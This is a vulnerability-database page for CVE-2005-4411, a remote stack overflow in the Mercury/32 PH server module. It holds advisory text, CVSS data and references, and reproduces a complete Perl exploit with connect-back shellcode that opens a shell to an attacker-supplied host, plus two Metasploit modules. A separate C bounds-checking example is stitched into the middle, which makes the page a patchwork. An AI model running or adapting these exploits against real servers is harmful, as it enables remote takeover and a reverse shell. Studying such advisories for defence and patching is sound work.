CVE-2005-4411
CVSS7.5
Published: 2005-12-20 06:03:00
Revised: 2008-09-10 15:52:25

[Original] Buffer overflow in Mercury Mail Transport System 4.01b allows remote attackers to execute arbitrary code via a long request to TCP port 105.


[CNNVD] Mercury/32 PH Server Module Remote Buffer Overflow Vulnerability (CNNVD-200512-457)

Mercury IMAP is a mail transport system.
The mailbox name service in Mercury IMAP contains a buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the server process and thereby take control of the server.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4411
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4411
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-457
(official data source) CNNVD

- Other links and resources

http://securitytracker.com/id?1015374
(UNKNOWN)  SECTRACK  1015374
http://xforce.iss.net/xforce/xfdb/23669
(UNKNOWN)  XF  mercury-mailboxnameservice-bo(23669)
http://www.securityfocus.com/bid/16396
(UNKNOWN)  BID  16396
http://www.osvdb.org/22103
(UNKNOWN)  OSVDB  22103
http://secunia.com/advisories/18611
(UNKNOWN)  SECUNIA  18611
http://milw0rm.com/exploits/1375
(UNKNOWN)  MILW0RM  1375

- Vulnerability information

Mercury/32 PH Server Module Remote Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-12-20 00:00:00 2005-12-20 00:00:00
Remote
Mercury IMAP is a mail transport system.
The mailbox name service in Mercury IMAP contains a buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the server process and thereby take control of the server.

- Advisories and patches

The vendor has released an upgrade patch that fixes this security issue; it can be obtained from:
http://www.pmail.com/overviews/ovw_mercury.htm

- Vulnerability information (1375)

Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER) (EDBID:1375)
windows remote
2005-12-16 Verified
105 Kingcope
N/A [Download]
### mercurysexywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
###################################################################
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\xA8\xD7\x9B\x69"
."\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x9E\xE6\x8A\x4B"
."\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x92\x93\x93\x93"
."\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x0E\xA8\x3D\x3D"
."\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x94\x49\x87\xFE"
."\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\xF1\x0B\x8B\x83"
."\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x03\x09\xCF\xC1"
."\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\xC1\x1F\xA4\x49"
."\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x69\x9C\x9B\x01"
."\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\xD4\x6F\x1B\xC7"
."\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x6F\x2E\x3B\x68"
."\xA2\x25\xBB\x04\xBB";

$numtargets = 1;

@targets =
(
 ["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "\x83\xf2\x41\x00"]
);

print "Okayokay THiS iS 0DAY!!!\n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT\nkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!\n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!\n";
if ($#ARGV ne 3) {
       print "usage: mecurysexywarez.pl target targettype yourip yourport\n\n";
   for ($i=0; $i<$numtargets; $i++) {
        print " [".$i."]...". $targets[$i][0]. "\n";
   }
       exit(0);
}

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '105',
                             Proto    => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);

($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);

$pad="A" x 408 . $cbsc . "\x90\x90\xeb\x04";
$pad2="A" x 440;

$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPP\xe9\x87\xfe\xff\xff".$pad2;
print $sock "$x\r\n";

while (<$sock>) {
       print;
}

# milw0rm.com [2005-12-16]

- Vulnerability information (16419)

Mercury/32 <= v4.01b PH Server Module Buffer Overflow (EDBID:16419)
windows remote
2010-06-15 Verified
0 metasploit
N/A [Download]
##
# $Id: mercury_phonebook.rb 9525 2010-06-15 07:18:08Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercury/32 <= v4.01b PH Server Module Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in
				Mercury/32 <= v4.01b PH Server Module. This issue is
				due to a failure of the application to properly bounds check
				user-supplied data prior to copying it to a fixed size memory buffer.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9525 $',
			'References'     =>
				[
					[ 'CVE', '2005-4411' ],
					[ 'OSVDB', '22103'],
					[ 'BID', '16396' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
					[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Dec 19 2005',
			'DefaultTarget' => 0))

		register_options([ Opt::RPORT(105)], self)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  rand_text_alphanumeric(224, payload_badchars)
		sploit << payload.encoded + "\xeb\x06" + make_nops(2)
		sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end

- Vulnerability information (F83209)

Mercury/32 <= v4.01b PH Server Module Buffer Overflow (PacketStormID:F83209)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-4411
[Download]

This Metasploit module exploits a stack-based buffer overflow in Mercury/32 <= v4.01b PH Server Module. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercury/32 <= v4.01b PH Server Module Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack-based buffer overflow in
				Mercury/32 <= v4.01b PH Server Module. This issue is
				due to a failure of the application to properly bounds check
				user-supplied data prior to copying it to a fixed size memory buffer.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2005-4411' ],
					[ 'OSVDB', '22103'],
					[ 'BID', '16396' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
					[ 'Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 } ],
				],

			'Privileged'     => true,

			'DisclosureDate' => 'December 19 2005',

			'DefaultTarget' => 0))

			register_options([ Opt::RPORT(105)], self)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit =  rand_text_alphanumeric(224, payload_badchars)
		sploit << payload.encoded + "\xeb\x06" + make_nops(2)
		sploit << [target.ret].pack('V') + [0xe8, -450].pack('CV') + "\r\n"

		sock.put(sploit)
		
		handler
		disconnect
	end

end

- Vulnerability information

22103
Mercury Mail Transport System ph Server Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- Vulnerability description

A buffer overflow exists in Mercury Mail. The ph server fails to validate string data received on TCP port 105 resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-12-16 Unknown
2005-12-16 2006-01-01

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, David Harris has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Mercury Mail Remote Mailbox Name Service Buffer Overflow Vulnerability
Boundary Condition Error 16396
Yes No
2006-01-26 12:00:00 2008-12-11 11:41:00
kcope <kingcope@gmx.net> discovered this issue.

- Affected program versions

David Harris Mercury (win32 version) 4.0 1b
David Harris Mercury (win32 version) 4.0 1a

- Vulnerability discussion

Mercury Mail is prone to a remote buffer-overflow vulnerability in its mailbox name service. This issue occurs because the application fails to properly bounds-check user-supplied input before copying it to a finite-sized memory buffer.

Exploiting this vulnerability allows remote attackers to execute arbitrary machine code with SYSTEM privileges in the context of the affected server process.

Mercury Mail 4.01b is affected; other versions may also be affected.
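The bounds check whose absence the descriptions above identify, as an added example that is not part of this record and not Mercury/32's own code: one PH request line read from TCP port 105 is copied into a fixed-size stack buffer only after its length has been compared with the buffer's capacity, so a constructed over-long request is refused rather than written past the end of the buffer. The function names, the 256-byte line limit and the sample inputs are assumptions made for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

/* Assumed limit for one PH request line; the real server's buffer size is
 * not stated in the advisory. */
#define PH_MAX_REQUEST 256

enum ph_status { PH_OK = 0, PH_TOO_LONG = 1, PH_BAD_CHAR = 2, PH_ERROR = 3 };

/* Copy one request line from `in` (in_len bytes read from the socket) into
 * `out` (capacity out_cap). The trailing CR/LF is dropped, control bytes are
 * refused, and the length is compared with the destination capacity before
 * any byte is copied: an over-long request is rejected instead of running
 * past the end of the fixed-size buffer. */
enum ph_status ph_copy_request(const char *in, size_t in_len,
                               char *out, size_t out_cap)
{
    size_t n = in_len;
    size_t i;

    if (out_cap == 0)
        return PH_ERROR;

    while (n > 0 && (in[n - 1] == '\r' || in[n - 1] == '\n'))
        n--;

    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        if (c < 0x20 || c == 0x7f)
            return PH_BAD_CHAR;
    }

    if (n >= out_cap)            /* keep one byte for the terminator */
        return PH_TOO_LONG;

    memcpy(out, in, n);
    out[n] = '\0';
    return PH_OK;
}

/* The shape a request handler takes: a fixed stack buffer that is filled
 * only through the checked copy above. */
enum ph_status ph_handle_line(const char *in, size_t in_len)
{
    char request[PH_MAX_REQUEST];
    return ph_copy_request(in, in_len, request, sizeof request);
}

/* Build a constructed request of `len` 'A' bytes plus CRLF and run it
 * through the handler, so behaviour at and past the limit can be checked. */
enum ph_status ph_probe_length(size_t len)
{
    enum ph_status st;
    char *buf = malloc(len + 2);
    if (buf == NULL)
        return PH_ERROR;
    memset(buf, 'A', len);
    buf[len] = '\r';
    buf[len + 1] = '\n';
    st = ph_handle_line(buf, len + 2);
    free(buf);
    return st;
}

static const char *ph_status_name(enum ph_status st)
{
    switch (st) {
    case PH_OK:       return "accepted";
    case PH_TOO_LONG: return "rejected: too long";
    case PH_BAD_CHAR: return "rejected: control byte";
    default:          return "error";
    }
}

int main(void)
{
    /* Constructed inputs: an ordinary lookup and increasingly long lines. */
    const char normal[] = "query smith\r\n";
    size_t lens[] = { 16, 255, 256, 1024 };
    size_t i;

    printf("%-12s %s\n", "normal",
           ph_status_name(ph_handle_line(normal, sizeof normal - 1)));
    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("%-12zu %s\n", lens[i], ph_status_name(ph_probe_length(lens[i])));
    return 0;
}
```

The ordering matters: the capacity comparison comes before `memcpy`, and the limit is derived from `sizeof request` rather than a separately maintained constant, so the two cannot drift apart. A request of exactly 255 bytes is the longest the 256-byte buffer accepts; anything at or beyond the limit is refused with PH_TOO_LONG.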

- Exploit

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploit is available:

- Solution

The vendor has released a patch to address this issue.

David Harris Mercury (win32 version) 4.0 1b
David Harris Mercury (win32 version) 4.0 1a

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites